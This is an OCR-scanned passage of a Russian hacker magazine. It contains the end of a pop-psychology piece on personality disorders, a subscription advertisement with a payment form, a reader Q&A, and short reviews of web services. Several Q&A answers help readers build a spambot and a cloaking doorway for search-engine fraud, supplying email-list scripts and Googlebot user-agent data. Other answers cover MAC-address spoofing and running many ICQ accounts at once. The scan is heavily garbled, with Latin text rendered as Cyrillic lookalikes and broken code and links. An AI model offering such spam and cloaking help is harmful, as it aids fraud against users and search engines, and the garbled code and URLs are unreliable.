но, достигнутый эффект будет 
держаться меньше, а терпения 
тебе потребуется намного, намного 
больше. Потому что иногда это про- 
сто нестерпимо противно — 
общаться с параноидальным 
психопатом :). 

Я самый великий 
волшебник. Я са- 
мый великий вол- 
шебник 

Помнишьтого безумного чувака с 
волшебными спичками из крутого 
советского фильма «Тайна желез- 



ной двери»? Который магическим 
способом установил в свою рези- 
денцию туевухучу статуй, изобра- 
жающих себя же? Болеетого, этот 
злобный психопат даже записал 
свой голос на пластинку, чтобы та 
постояннозомбировала его самого 
вышеуказанной фразой. 
Апочемуон все это делал? В 
первую очередь, потому что он — 
счастливый обладатель нарцисси- 
ческого расстройства личности. Он 
считает себя самымумным, самым 
красивым, самым грамотным. 
Самым-самым. И кеды-тоу него 
самые американские, и футболка-то 
круче, чемусамого Брюса Ли. И по- 
пробуй только сей фактоспорить — 
разорвет на части. Нарциссы 
очень, очень нетерпимо относятся 
к критике своей исключитель- 
ности. Например, дажееслиты 
обоснованно возразишь, чтоу 
американцев таких а мери канских 
кроссовок все равно больше — 
обидится, а то и разозлится. Так, 
стоп, а зачем же емутогда прослу- 
шиватьсвои записи, если он итак 
в своем величии не сомневается? 
Да потому что подсознательно он 
в этом как раз сомневается. Его 
гложет тревога, и именно поэтому 
нарциссу очень нужно постоянное 
подтверждение своей исключи- 
тельности со стороны окружающих 
(на крайний случай и граммофона 
будет достаточно]. Ключ кобщению 
прост: не сомневаться в исклю- 
чительности, избегать критики, 
говорить комплименты (перебор- 
щить, как и в случае с гистрионным 
истериком, трудно]. Все, онтвой. 
Соответственно, мощный поток 
критики может вызватьу нарцисса 
ярость, переходящую в случае ее 
(критики, особенно — обоснован- 
ной) передозировки вдепрессию, 
что, согласись, неконструктивно. 

Не знаю, не могу 
решить. Спросите 
ужены 

Чтобы понять суть «зависимого 
расстройства личности», тебе 
не нужно обращать свой взор на 
окружающих людей. Достаточно 
посмотреть мультфильмы, в кото- 
рых образ «зависимого» человека, 
эдакого очкарика, дружащего с 
хулиганом-заводилой, раскрыт 
очень полно. Получите пример — 
Миллхауз и БартСимпсон. Зависи- 
мая личность, невротики вообще 
классический очкарик Миллхауз 
в одиночку чувствует себя слабым 
и ни на что не годным. Подобно 



рыбе-прилипале, околачивающей- 
ся вокругакулы, он прилипаеткза- 
водиле Барту Симпсону и, находясь 
в его тени, чувствует себя очень 
даже неплохо. В целом же, «за- 
висимый» психически довольно 
слаб (старое название — астени- 
ческая психопатия), внушаем, с 
трудом принимает решения и несет 
за них ответственность. По воз- 
можности же он старается вовсе 
не принимать никаких решений, 
перекладывая это право на плечи 
своего «опекуна» или просто 
окружающих. Кстати, «больших 
детей», за которых все решают 
члены семьи или супруги, вроде 
Хоботова из «Покровских ворот», 
тоже можно причислить к персона- 
жам, страдающим этим зависимым 
расстройством. 

Если ты видишь перед собой такого 
человека, знай, что он сравнитель- 
но безопасен и довольно внушаем. 
Контактировать с ним довольно 
просто — вреда от него нет (как- 
никак, неасоциальныйже это пси- 
хопат], конкуренции по работе он 
не составляет, а общих дел с ним и 
вовсе иметь нежелательно — ввиду 
слабости позиции и неумения при- 
нимать решения, атакже крайней 
услужливости, своими метаниями 
между «покровителями» может 
подвести тебя и завалить весь со- 
вместный проект. Хотя с другой сто- 
роны, если ты и есть покровитель 
«зависимой личности», тебе может 
импонировать сам факт наличия 
собственного раба лампы, который 
с удовольствием будет заглядывать 
тебе в рот и исполнять твои мелкие 
поручения. Как говорится, на вкус 
и цвет. Только не забывай при этом, 
чтоза все, что происходитствоим 
маленьким другом, отвечаешь 



ты. Поэтому его кредиторы придут 
ктебе, его собачку выгуливать 
будешьты, а его неприятности це- 
ликом и полностью — твоя забота. 
Онотебе надо? 

Заключение 

Вот и подошло к концу наше по- 
вествование об оригинальных 
личностях. Кстати, не все рас- 
стройства я разобрал — отчасти 
потому, что журнал не резиновый, 
отчасти — по причине слабой ин- 
тересности оставшихся за бортом 
типов. Например, «избегающее 
расстройство» встретится тебе в 
лице подозрительных девушек, 
которые и хотели бы с кем-то 
сблизиться (да, в том числе — в 
интимном плане], но на самом 
деле — боятся этого, боятся 
близкого контакта, возможно- 
го унижения, критики. Чтобы 
оправдать этот подсознательный 
страх, они нередко весьма активно 
выносят мозг противоположному 
полу, да такэффектно, что парни 
буквально из кожи вон лезут, 
чтобы понять, что вообще нужно 
этой на голову стукнутой девушке. 
Аей ничего и не нужно, просто 
она боится интимного (в психо- 
логическом смысле) контакта. 
Упустил я и пассивно-агрессивное 
расстройство личности, страдаю- 
щие каковым с удовольствием 
критикуют власть имущих, сидя у 
экрана телевизора и побаиваясь 
«черного ворона», который может 
за ними приехать в четыре часа 
утра. Так или иначе, нам пора 
закругляться. Надеюсь, теперь 
ты посмотришь на окружающих 
другими глазами и поймешь, что 
они не просто больные на голову, а 
больные чем-то конкретным, т 
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БУДЬ УМНЫМ! 

ХВАТИТ ПЕРЕПЛАЧИВАТЬ В КИОСКАХ! СЭКОНОМЬ 660 РУБ. НА ГОДОВОЙ ПОДПИСКЕ! 




Годовая подписка по цене 2100 ру 



175 руб. за один номер, что на 23% дешевле чем рекомендуемая розничная цена (230 
руб. за одн номер ) 




ЕДИНАЯ ЦЕНА ПО ВСЕЙ РОССИИ. ДОСТАВКА ЗА СЧЕТ ИЗДАТЕЛЯ. В ТОМ ЧИСЛЕ КУРЬЕРОМ ПО МОСКВЕ В ПРЕДЕЛАХ МКАД 













дйтостойт 



.на 



ВНИМАНИЕ! 

ВТОРОЕ 



+ СПЕЦПРЕДЛОЖЕНИЕ! 



ПРИ ПОДПИСКЕ НА КОМПЛЕКТ ЖУРНАЛОВ 
ЖЕЛЕЗО + ХАКЕР + ОѴР: 

- ОДИН НОМЕР ВСЕГО ЗА 155 РУБЛЕЙ 
(НА 35% ДЕШЕВЛЕ. ЧЕМ В РОЗНИЦУ) 



И ЭТО ЕЩЕ НЕ ВСЕ! 
ПОЛУЧИ В ПОДАРОК 
ОДИН ЖУРНАЛ 
ДРУГОЙ ТЕМАТИКИ 



ОФОРМИВ ГОДОВУЮ ПОДПИСКУ 
В РЕДАКЦИИ, ТЫ МОЖЕШЬ 
БЕСПЛАТНО ПОЛУЧИТЬ ОДИН 
СВЕЖИЙ НОМЕР ЛЮБОГО 
ЖУРНАЛА, ИЗДАВАЕМОГО 
КОМПАНИЕЙ «ГЕЙМ ЛЭНД»: 



ЗА 24 НОМЕРА 



ЗА 12 НОМЕРОВ 



ГГС 



фато 

МАСТЕРСКАЯ 



■ : : и а , 



«чда» — 

тн 

«Фото- «Мобильные «ТЗ. Техника «Страна Игр» «Вышиваю 

мастерская»+СО компьютеры» Третьего Тысячелетия» +20Ѵй крестиком» 



«Тюнинг 

Автомобилей» 



□ІЮ 



НфіЕпР дешевеет 



Зітоке Тоіаі ОѴО+ОѴО «Железо»+0Ѵ0 ОѴОХрегГ «РС Игры»+20\Ю ОідіТаІ РЬоТо 



• ЯНВАРСКИЙ НОМЕР — подписавшись 
до 30 ноября 

• ФЕВРАЛЬСКИЙ НОМЕР — подписавшись 
до 31 декабря 

• МАРТОВСКИЙ НОМЕР -подписавшись 
до 31 января 




5кі Равз «Форсаж.ТА» Моипііп Віке ОЫВОАРО ТоГаІ РооіЬаІІ+ОѴО «Хулиган» 







СЕРВИС 



ВЫГОДА • ГАРАНТИЯ • 



ЗТО ЛЕГКО!!! 

1. Разборчиво заполните подписной купон и квитан- 
цию, вырезав их из журнала, сделав ксерокопию 
или распечатав с сайта вбор.аіс.ги . 

2. Оплатите подписку через любой банк. 

3. Вышлите в редакцию копию подписных докумен- 
тов — купона и квитанции — любым из нижепере- 
численных способов: 

• по электронной почте зиЬ$сгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва, 

ул. Тимура Фрунзе, д. 11, стр. 44, 

ООО «Гейм Лэнд», отдел подписки. 



ВНИМАНИЕ! 

ПОДПИСКА ОФОРМЛЯЕТСЯ 
В ДЕНЬ ОБРАБОТКИ КУПОНА И КВИТАНЦИИ 
С НОМЕРА. ВЫХОДЯЩЕГО ЧЕРЕЗ ОДИН 
КАЛЕНДАРНЫЙ МЕСЯЦ ПОСЛЕ ОПЛАТЫ. 

Например, если произвести оплату в январе, 
то подписку можно оформить с марта. 

В КАЖДОМ НОМЕРЕ УНИКАЛЬНЫЙ Ш 
СТОИМОСТЬ ЗАКАЗА 

2100Р ЗА 12 МЕСЯЦЕВ + ПОДАРОЧНЫЙ ЖУРНАЛ 
1200Р НА 4 МЕСЯЦЕВ. ПОДАРОЧНЫЙ ЖУРНАЛ ПРИ ЭТОМ НЕ ВЫСЫ- 
ЛАЕТСЯ 



Длля жителей Москвы (в пределах МКАД) доставка может осуществляться бесплатно с курьером «из рук в руки» в течении трех рабочих 
дней с момента выхода номера на адрес офиса или на домашний адрес 



ЗВОНИ! по бесплатным телефонам 8(495)780-88-29 
(для москвичей) и 8(800)200-3-999 (для жителей дру- 
гих регионов России, абонентов сетей МТС, БиЛайн 
и Мегафон). ТВОИ ВОПРОСЫ, ЗАМЕЧАНИЯ И/ИЛИ 
ПРЕДЛОЖЕНИЯ ПО ПОДПИСКЕ НА ЖУРНАЛ ПРОСИМ 
ПРИСЫЛАТЬ НА АДРЕС: іпіоіадіс.ги 



ОФОРМИТЬ ПОДПИСКУ на Хакер стало еще 
проще! 

Еще один удобный способ оплаты подписки 
на твое любимое издание — в любом из 
72 000 платежных терминалах ОІѴѴІ (КИВИ) 
по всей России. 




ПОДПИСНОЙ КУПОН 



ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ « 


» 


П на 6 месяцев 
]] на 12 месяцев 




начиная с 


о 

С\| 


^ прошу выслать бесплатный 
номер журнала 



|— I Доставлять журнал по почте 
1 на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

□ на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ) 

код 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ОАО «Нордеа Банк», г. Москва 

р/с N° 40702810509000132297 



к/с № 30101810900000000990 



БИ К 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордеа Банк», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИ К 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г 





Кассир 



Ф.И.О. 

Подпись плательщика 



МАГ 



ЦЫІТЗ 



1 




0: Как проще всего из одного списка мыл удалить 
те, которые присутствуют в другом списке мыл? 

А: Проще всего с поставленной тобой задачей 
справится следующий несложный скрипт на 
рЬр: 

<?рЪр 

$рагзес1_етаі1з = аггау_тар ( 

' Сгіт ' [і ііе ( ' ЧТО_УДАЛЯЕМ . РхР ' ) ) ; 

$пем_етаі1з = аггау_шар ( 

' Сгіш 1 Д ііе ( ' ОТКУДА_УДАЛЯЕМ . РхР ' ) ) ; 

$ііШегес1 = 

іогеасЫ ( $пеѵ\г_ешаі1з аз $пеѵ\0 
{ 

іі ( ! іп_аггау ( $пеілц 

$рагзес!_етаі1з) ) 
$ііІРегес1 .= $агг. " \п"; 

} 

іі1е_риС_сопСепСз ( 

' ИТОГОВЫЙ_СПИСОК . РхР ' , 

$іі11іегесі) ; 

?> 



Также, еслиты работаешь в никсах, тебе помо- 
жет следующая команда: « 50 ГІ ЧТО_УДАЛЯЕМ. 
М ОТКУДА_УДАЛЯЕМ.М I ипщ -и > ИТОГО- 
ВЫЙ^ ПИ СО К.М». 

0: Занимаюсь созданием спамбота. Назрел воп- 
рос о том, где бы взять более или менее полные 
списки городов и стран мира? 

А: Существуют множество сайтов, посвященных 
созданию и заполнению различныхсписков 
объектов, существующих на нашей планете. 
Один из моихлюбимьіх сервисов —уургШаиая 
сот/деодиігАЬеІізГЫт . 

Здесьты можешь найти некоторые данные о 
Земле (вес, население, площадь, скорость вра- 
щения и т.д.) , списки наиболее крупных морей, 
островов, озер, рек, океанов, континентов, гор. 
Также здесь есть и интересующиетебя списки 
стран и городов мира (суказанием различных 
данных по населению] в самых различных 
вариациях. Например, вот список 10 наиболее 
крупных городов США: 

Бем Уогк СіРу , ЫУ 8.09 шііііоп 
Ьоз Апдеіез , СА 3 . 8 шііііоп 



СЬісадо, ІЬ 3.1 шііііоп 
НоизСоп, ТХ 2 . 78 шііііоп 
РМ1ас1е1рМа , РА 1.62 шііііоп 
РЬоепіх, А 2 1.54 шііііоп 
Зап АпРопіо, ТХ 1 . 5 шііііоп 
Зап Біедо, СА 1 . 4 шііііоп 
Баііаз, ТХ 1.32 шііііоп 
БеРгоіР , МІ 1 шііііоп 

Если же тебя (и твоего спамбота :]] такие 
подробности не интересуют, то заходи на ЬНрУ/ 
орепсопсерТса/Ыоа/таійогбЛехІ: ІІ5і аіі 
соипігіез и копипастьсебе простой текстовый 
списокиз 195стран мира. 

Для городов мира (а также для любых других 
локаций] существует один из наиболее подроб- 
нейших списков, качай его по адресу ѵуогісГ 
аагеиеег.сот/сіаіаепуір . 

В архиве содержится простой текстовый файл, 
имеющий следующую структуру: 

• уникальный іб-номер географического 
объекта; 

• имя объекта (на английском, если доступно); 

• альтернативные имена; 

• имя на оригинальном языке (кириллица и т.д.]; 
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тип географического объекта (страна, город и 
Д-); 

•текущая популяция; 

• широта; 

• долгота; 

• страна; 

• головная административная единица первого, 
второго и третьего уровней. 

О: Каким образом можно увидеть результаты 
поиска сразу в Яндексе/Гугле и в Яндекс/Гугл 
блогах? 

А: Специально для тебя некий Аргок создал 
сервис ЫірТ/зео-оІѵеІ.ги . 

Здесьты можешь ввести в специальное окошко 
свой поисковый запрос и увидеть результаты 
поиска сразу в нескольких системах: Ооодіе, 
Ооодіе блоги, Ооодіе Ітадез, Ооодіе ІЧеѵѵз, 
Ѵапбех, Ѵапбех блоги. Также система сохранит 
твой запрос и покажет его в списке из 1 5 послед- 
нихзапросов. 

О: Занимаюсь созданием клоакинг-доргена. 
Подскажи, где взять валидные строки с юзера- 
гентами поисковиков? 

А: Специальный сервис изегадепізігіпд.сот/ 
радез/изегадепІзІгіпд.рЬр с легкостью предо- 
ставляеттебе такую возможность. 

Зайдя на представленную выше страницуты 
увидишь полные списки из всех известных 
юзерагентов, разбитые по категориям: 

• кравлеры или пауки поисковых машин; 

• браузеры; 

• КОНСОЛИ; 

• оффлайн браузеры; 

• е-таіі клиенты; 

• линк-чекеры; 

• е-таіі коллекторы; 

• валидаторы; 

• фид-ридеры; 

• библиотеки; 

• другие. 

Нажав, например, на ссылку с юзерагентом 
«6оодІеЬоІ»,ты увидишь все возможные 
изегадепізіхіпдздля этого паука: 

Мо2І11а/5.0 (сошраСіЫе; 

СоодІеЬоС/2 . 1 ; +доод1е . сош/ЬоС . 

ЬДшІ ) 

СоодІеЬоС/2 . 1 (+доод1еЬоС . сош/ЬоС . 
ТШтІ ) 

СоодІеЬоС /2.1 ( +доод1е . сот/ЬоС . ІШтІ ) 

Далее, нажав на одну из этих строк, ты увидишь 
ее подробнейший разбор, включая ір-адреса 
гугла, что не может не пригодиться при кодинге 
клоакинг-доргена :] 

О: Подозрительно быстро утекает интернет- 
трафик. Как бы проверить, какие процессы его 
кушают? 



А: Конечно, самым очевидным решени- 
ем было бы использование встроенных 
возможностей любого файрвола, но есть и 
другой способ: просто скачай и запусти соф- 
ти ну 2ір МеіМопіІог ( Ыір://2ір.ги/сІоѵѵпІоасІ/ 
МеіМопіІогехе ). 

Запустив программу, ты увидишь окошко с 
несколькими колонками: 

• название процесса или программы, которые 
используют сетевое соединение; 

• протокол; 

• локальный адрес; 

• порттвоего компьютера; 

•удаленный адрес; 

• портудаленного компьютера; 

• состояние процесса. 

Колонка с состоянием процесса может прини- 
мать следующие значения: 

Ы8ТЕЫ — ожидание запроса на со- 
единение со стороны чужих портов и 
программ ТСР ; 

ЗУѢТ-ЗЕѢІТ — ожидание парного запроса 
на установление соединения; 
ЗУЫ-КЕСЕІѴЕБ — ожидание подтвержде- 
ния после того, как запрос соедине- 
ния уже принят и отправлен; 
Е8ТАВЫ8НЕБ — состояние открытого 
соединения; 

РШ-Ѵ7АІТ-1 — ожидание запроса от 
чужой программы ТСР или подтвержде- 
ния ранее отправленного запроса на 
закрытие соединения; 

РШ-Ѵ7АІТ-2 — ожидание запроса на 
закрытие соединения со стороны чужой 
программы ТСР; 

СБ08Е-Ѵ7АІТ — ожидание запроса на за- 
крытие соединения со стороны своего 
клиента ; 

СЬОЗШО — ожидание подтверждения со 
стороны чужой программы ТСР запроса 
о закрытии соединения; 

ЬАЗТ-АСК — ожидание запроса на за- 
крытие соединения, ранее отправлен- 
ного чужой программе ТСР; 

ТІМЕ-Ѵ7АІТ — ожидание истечения до- 
статочного количества времени; 
СЬОЗЕБ — состояние полного отсутст- 
вия соединения; 

Е8ТАВ — активные на данный момент 
соединения . 

Из этих состояний советую заинтересоваться 
состоянием Е5ТАВ — это именноте процессы, ко- 
торые в данный моментиспользуюттвой канал. 

0: Хочу протестировать свои хакерские навыки 
в области веб-уязвимостей. Где это можно 
сделать? 

А: Итак, одна из лучших готовых площадок для 
тестирования своиххек-способностей — это 



«Оатп ѴиІпегаЫе ѴѴеЬ Арр» (бѵѵѵа]. Данная 
площадка имеетЗ уровня сложности и подде- 
рживает следующие виды атак: 

• ЗОИщесбоп; 

• Х55 (СгоззЗіІеЗсгірІіпд); 

• І_Н (І_осаІ Рііе Іпсіизіоп]; 

• ПРІ (Петоіе Рііе Іпсіизіоп]; 

• СоттапсІ Рхесиііоп; 

• Ііріоаб Зсгірі; 

• Родіп Вги1:е Рогсе; 

• другие виды. 

Для использования бѵѵѵа необходим любой веб- 
сервер с работающим Му5(Х (известный тебе 
Денвер вполне подойдет, ЫірУ/сІепѵѵег.ги ]. 
Видео с подробным описанием и инструк- 
цией можно посмотреть на ѴоиТиЬе ( ѵоиіибе. 
соі7Ѵ\л/аІсб?ѵ=б2у07ф8гМ ). официальный сайт 
площадки — еіЫсаІбаскЗг.со.ик . качаем бѵѵѵа 
тѵт ЬирТ/зоигсеІогде.пеі/рпзіесІз/сІѵѵѵа . за инфу 
говорим спасибо мемберуАнтичата ЬЗ :]. 

Также хочу привести небольшой списокуже 
готовыхдля пентестинга сайтов- площадок от 
ѴиІМіЦс: 

ЗРІ Бупатісз (Ііѵе) — іШБр : //гего . 
меЬаррзесигіБу . сот 
Сепгіс (Ііѵе) — іШБр : / /сгаскте . 
сепгіс . сот 

ШксМіге (Ііѵе) — ТШкр : / /сіето . 
кезкііге .пек 

Асипекіх (Ііѵе) — ІШкр : //кезкркр . 
асипекіх . сот, ЪДкр : / /кезказр . 
асипекіх . сот, ІШкр : / /кезказрпек . 
асипекіх . сот 
ТДеЬМаѵеп / Видду Вапк — 
таѵепзесигіку . сот/ілеЬтаѵеп 
Роипсізкопе ЗАЗЗ кооіз — іоипсізкопе. 
сот/из/гезоигсез-ігее-кооіз . азр 
Брсіакесі НасктеВапк — о2-оипсеореп. 
сот/кесТтіс. . . -кастеЪапк . ТШтІ 
(ЖАЗР ІДеЬСоак — оілазр . огд/іпсіех. 
ркр/ОМАЗР_1ДеЪСоак_Ргоз еск 
ОѴ/АЗР ЗікеСепегаког — оѵѵазр.огд/ 
іпсіех . р1ір/0мазр_ЗікеСепегаког 
Зкапіогсі ЗесигіВепсЪ. — ІШкр : //зиіі . 
зкапіогсі . ес!и/~1іѵз1іікз/зесигіЪепс]т 
ЗесигіВепсЪ. Місго — Ъккр : / /зиіі . 
зкапіогсі . ес!и/~1іѵзЪікз/тлгогк/ 
зесигіЪепсЪ-тісго 

Подробности о перечисленных площадках 
ищи на Античате — оІІрТЛогит.апІісбаІ.ги/ 
ІбгеасМ 30070. Ыті . 

0: Существует ли никсовый аналог ісц-клиента 
ОІР? 

А: Из всех ІМ-клиентов под никсы только диІІМ 
наиболее похож на квип (данный проект даже 
изначально позиционировался как*піх-аналог 
ОІР'а] , а следовательно, и более подходит в 
твоем случае. 
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ІЛЧІТ5 



Особенности и возможности проги: 

• поддержка ІСО, ^аЬЬег/ѲТа^к/Уа.Оп^іпе/ 
иѵеЭоигпаІ.сот, МаіІ.Ри, ІРС; 

• табовый и многооконный режимы сообщений; 

• приемлемое потребление памяти; 

• множество наборов смайлов; 

• поддержка Х-статусо в. 

Официальный сайт пейджера — ЫірУ/дибт. 
зоигсеіогде.пеі . 

Р5. Также существуют версии циІІМ под винду и 
мак. 

О: Как сменить МАО -адрес через реестр? 

А: Для смены своего мак-адреса воспользуемся 
советом от пользователя форума хакег.пате 
ІМеіЗку: 

1. Заходим в реестр по адресу НКЕѴ_І_ОСАІ__ 
МАСНІІМЕ^ ЗѴ5ТЕМ ^ СиггепіСоЫгоІЗеІ^ 

СОПІГОІ СІЭ55; 

2. Находим значение4Б36Е972-Е325— 1 1СЕ- 
В ЕС 1— 08002В Е1 031 8; 

3. Перебираем папки с номерами 0000, 0001 , 
0002, 0003 ит.д., пока в правом окошке не най- 
дем свою сетевуху; 

4. Создаем там же ключ «ІЧеІѵѵогкАсІсІгезз» 
(строковой параметр) и присваиваем значение 
мак-адреса, на который желаем подменить 
существующий мак; 

5. Перезагружаемся. 

Для восстановления стандартного адреса прос- 
то удаляем созданный ключ. 

О: На дедике не работает Іпіегпеі Ехріогег. 

Как быть? 

А: Скорее всего, виноваты локальные политики 
безопасности в ослике. Для исправления сего 
нелицеприятного факта делай следующее: 

1. Заходи на вкладку Сервисѣ Свойства обозре- 
вателя -^Безопасность; 

2. Выбирай иконку «Интернет», затем чуть ниже 
жми кнопку «Другой...»; 

3. В открывшемся списке включай любые нуж- 
ныетебе возможности ІЕ. 

О: Можно ли сидеть одновременно с очень боль- 
шого количества ІСО-номеров? 

А: Специально длятебя некий РапкоР написал 
прогу СЮБСАРАѵѵаге, которая позволяет выво- 
дить в онлайн большое количество номеров ІСО 
с флагом ѴѴЕВ_АѴѴАВЕ. 

Возможности тулзы: 

• автоответ на сообщения; 

• фильтрация спама; 

• возможность задать максимальное количество 
ответов на 1 сообщение; 

• возможность задать несколько различных 
сообщений; 

• сворачивание втрей. 

В пабликверсии работаетв один поток :(. Найти 
программу можно на официальном сайтеав- 
тора ЫірУ/ах-зоЫги [там же ты найдешь много 
другихтворений для работы с ІСО и Зкуре). 




О: Сейчас много разных готовых ЫѵеСО-дистри- 
бутивов для пентеста. Есть ли готовый инстру- 
мент для аудита безопасности ѴоІР? 

А: Есть. Сам недавно с интересом посмотрел 
на проект ѴА5Т, в котором авторы собрали 
качественный набор утилит для аудита безо- 
пасности ѴоІР [ ѵірегѵазі.зоигсеіогде.пеі і. Среди 
инструментов: БСзпіІф ѴоірНоррег, ѴісІео)ак, 
ѵісіеозпагі, АСЕ, ѴѴагѵох и многие другие. Также 
присутствуют известные Меіазріоіі:, ІЧтар, 
ІМеІсаІ:, Нубга, Нріпд2, но, скорее, для полноты 
ка рти н ы . 

О: Разрабатываю сканер уязвимости, специ- 
ально для анализа защищенности проектов на 
МогсіРгезз. Ничего хорошего пока не нашел. 

Если уже есть такие утилиты, подскажите! 

А: Затея очень неплохая. Какбы ни были хороши 
универсальные сканеры уязвимости, которые 
значительно могутупростить жизнь, специали- 
зированные средства для пентеста конкретных 
проектов всегда будут на шаг впереди, зная 
о потенциальных косяках и уязвимостях в их 
скриптах. Сама по себе идея не новая. Вотлишь 
несколько утилит для популярных ДВИЖКОВ: 

• Эоотіа: ЬирУ/ѵѵѵѵѵѵ.оѵѵазр.огд/іпбех.рбр 
Саіед о гу : 0ѴѴА5 Р_б оо т Іа_Ѵи Іп е га Ь Шіу_ 
5саппег_Рпфес1: 

• Ргираі: ЫірУ/гагОг.паппе/геІеазез/сІгираІ- 
ѵиІпегаЬіІіІѵ-зсаппег 

• ѴѴогсІргезз: ЫірУ/ЬІодзесигіІѵ.пеі/ѵѵогсІргезз/ 
Іооіз/ѵѵр-зсаппег 

О: Хочу перенести физически существующий 
сервер в виртуальное окружение ѴМѵѵаге Бегѵег. 
Купили мощный сервер и хотим использовать 
все прелести виртуализации. Как лучше все это 
сделать? 

А:У компании ѴМѵѵаге специально для этих 
целей подготовлен инструмент ѴМѵѵаге 
ѵСепІегСопѵегІегІ ѵѵѵѵѵѵ.ѵітіѵѵаге.соітУргосІисІз/ 
сопѵегіег ). В саму программу заложены несколь- 
ко автоматизированных скриптов, управление 
которыми осуществляется с помощью специаль- 
ного мастера. По сути, программа делаетобразы 
твоей системы и, учитывая специфику виртуа- 
лизации, подгоняет их для работы в окружении 
ѴМѵѵаге. 

О: Для решения одной задачи требуется про- 
грамма для создания ВАМ-диска (все данные 
хранятся в оперативке) для Мпсіоѵѵз 7, причем 
бесплатная. Все, что удалось найти, оказалось 
либо нестабильным, либо платным, либо не 
поддерживающим ѴізІа/ѴѴ7. Так существует ли 
подходящий для меня вариант? 

А: Рекомендую попробовать драйвер РРатсІізк. 
зуз, представляющий по сути переделку 
МісгозоЫовского Ратбізк.зуз. Для управления 
драйвером написана специальная графичес- 
кая оболочка — обычно они распространяются 
вместе. Увы, у проекта нет домашней странич- 



ки, но ссылка для закачки легко ищется через 
боодіе позапросу«6аѵо1:1:е Ратсіізкѵѵііб диі». 
Несмотря на то, что разработка еще 2007 года, 
драйвер отлично работает даже под ѴѴіпбоѵѵз 7. 

О: Недавно прочитал, что боодіе запустил проект 
РиЫіс ЭЫБ — доступный всем бесплатный 
ОИБ-сервис, который по заявлению сотрудников 
компании работает шустрее других, обрабаты- 
вая сразу несколько запросов, а в результате 
несколько ускоряет загрузку сайта. Эффект 
достигается за счет более быстрого преобразо- 
вания символьного имени в цифровой ІР-адрес. 
Насколько это реально? И есть ли реальный 
способ измерить эффект от использования ОИБ- 
серверов Ооодіе'а. 

А: Для того чтобы заюзать новый сервис от 
Ооодіе, достаточно прописать в настройках 
подключения адреса 8. 8. 8. 8 или 8. 8. 4. 4. Нотут 
надо хорошо понимать, что сервера Ооодіе, 
возможно, и быстрее резолвят доменные имена, 
но при этом задержка до этих серверов может 
перекрывать весь эффект от подобной оптими- 
зации. Это особенно ощущается на медленном 
соединении, когда пинг может достигать ката ст- 
рофическихзначений. С другой стороны, на вы- 
сокоскоростном подключении использование 
публичных серверов с большим кэшем может 
быть более чем оправдано: задержка до БЫЗ и 
извлечение из кэша нужного адреса может быть 
меньше, чем обращение до локального сервера 
в роутере, которому часто приходится обращать- 
ся на вышестоящий сервис, чтобы зарезолвить 
незнакомое ему имя. Но минимальный пинг до 
серверов провайдера и широкий канал про- 
вайдера, благодаря которому он быстро может 
сходить на вышестоящий БІЧЗза нужными адре- 
сами, зачастую может оказаться меньше, чем 
использование публичных БІ\І5. Всезависитот 
разныхусловий и конкретную рекомендацию 
здесь дать сложно. 

Зато несложно выяснить наилучший сервер 
экспериментально. Если поста вить утилиту 
патеЬепсЬ [ собе.доодІе.сопп/р/паппеЬепсЫ .то 
несложно нетолько измерить скорость работы 
разных БІ\І5-серверов, но и выбрать наиболее 
быстрый из них. патеЬепсЬ запускаетспеци- 
альные бенчмарки на основе несложныхалго- 
ритмов определяет время резолвинга доменных 
имен различным серверами, причем в список 
для проверки изначально входят несколько 
публичных БЫЗ-ок, втом числе ШгаБІЧЗ, 
ОрепБІМЗ, атакже свеженький Ооодіе РиЫіс 
БІ\І5. Утилита написана на Руібоп и может быть 
запущена подлюбой платформой. 

Есть и другие способы для бенчамаркинга БІ\І5. 
Длятукса существует утилита бід, которая в моем 
БеЬіап расположена в пакете сіпзиііпз (зисіо 
аріііисіе іпзЕаІІ сІпзиЕіІз). Далее, запустив ко- 
мандутипа «бідуапсіех.ги», среди прочей инфы 
можно посмотреть поле «Оиегуііте», в которое 
выводится время, затраченное на запрос. НЕ 
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УСТАНОВКА НА ОБЫЧНЫЙ КОМП 
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5куЕ)пѵе 



Сервис для хранения 
и обмена файлами от 
* МісгозоК 




Недавние папки 

ІЧІ Хі Къ X» 



ч м* Что нового в сети 



ЫЕТѴІВЕ5 ѴѴА5АВІ 

ѵѵазаЬі.пеІѵіЬез.сот 




СйМщлІі. й*»|гщнмЫ | П 



ЗКУРКІѴЕ 



Несмотря на то, что боодіе Кеасіег определенно самый зрелый и 
продуманный онлайн-сервис для чтения К55-лент. все-таки очень 
не хочется считать сервисы боодіе’а истиной в последней инстанции, 
поэтому я люблю просматривать альтернативы. Для боодіе Оосзесть 
отличный аналог — инструмент 2обо, а для Ооодіе Кеабег недавно поя- 
вился ІЧеЫЬез ѴѴазаЬі. По сути, все то же самое: различные К55-ленты, 
разгруппированные потематике кактебе вздумается. Главные фишки — 
три разных способа подачи фидов и классный интерфейс, в котором для 
каждого фида отображается его баѵісоп. 



зкусігіѵе.ііѵе.сот 

Описание «бесплатное хранилище объемом 25 Гб в службе ѴѴіпсіоѵѵб 

|_іѵе» как нельзя лучше подходит для того, чтобы описать этот сер- 
вис от МісгозоИ Своего рода аналог ОгорЬох’а щедро предоставляет 
пространство на своихсерверах в облаке, позволяя легко обращаться 
кфайлам, держать все в одном месте и обмениваться с друзьями. А 
благодаря специальному расширению для винды БкуОгіѵе Ехріогег 
[ зкѵбгіѵеехріогегсот ) онлайн-хранилище легко интегрируется в систему. 
И все — бесплатно! 



з: 

5**Г(Л Они* 
Емій 


